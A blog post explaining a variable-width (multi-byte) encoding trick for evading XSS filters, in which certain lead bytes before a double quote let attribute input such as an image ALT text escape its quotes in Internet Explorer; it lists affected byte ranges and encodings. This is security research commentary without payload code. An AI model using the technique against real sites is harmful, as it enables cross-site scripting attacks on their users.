Just when you thought it was safe to jump back in the web security development waters something like this comes along. One of the things I’ve mentioned several times in my posts is that even once you figure out all this XSS stuff, you still need to make sure you have the proper encoding methods. My particular encoding method of choice is UTF-8. Then I read Cheng Peng Su’s explination of variable-width encodings filter evasion and my world shook for a moment. Truely shook.
Previously there were certain things you could assume are safe. Like, let’s say, an ALT tag in an image perhaps. The user should be allowed to enter anything in an ALT tag that they like, except the dreaded double quote that would jump them out of encapsulation. Well the way multi-byte works, it uses several characters and combines them into one. So if you butt a certain charachter up against another it renders as a third in the browser. Guess what, a double quote is a valid second char to butt up against. So if you put a certain set of chars butted up against a double quote you can now change that double quote into a meaningless third char which now keeps you encapsulated. Why is that good? Because we DO allow double quotes outside of the tags, because we are nice people and we like when people can quote things. When they put their own quote in after what we think is the end of the tag, that is now jumping them out of the encapsulation but within the realm of a valid HTML tag.
It’s all very confusing so I should probably give you an example. Click here in Internet Explorer. Excuse all the alert boxes, but that will show you which characters will work for this (it should also be noted that you actually don’t need the end angle bracket if you start another quote). It will just mess up the HTML, but for the purpose of the fuzzer output I had to put it in to keep it readable. It appears ASCII 192-253 and 255 all act as suitable starting double byte characters to jump out of quotes in UTF-8. As Cheng points out this is not limited to just UTF-8, but also GB2312, GB18030, BIG5, EUC-KR, EUC-JP, and SHIFT_JIS, although I think UTF-8 is by far the worst offender, even if it only affects Internet Explorer because of it’s prevalence. There’s a lot more research to be done here, with other chars and other encoding methods, but this is a fantastic start.
This is a very scary and very real possible exploit for any site that allows things like images with additional ALT parameters or inline style tags of any kind. This could have impacts all over the place. I will be curious to see how this plays out with the search engines (what encodings they are vulnerable to if any) for the blackhat SEO world. I applaud Cheng for finding this. It’s very easy to exploit if you know what you’re doing and very difficult to prevent.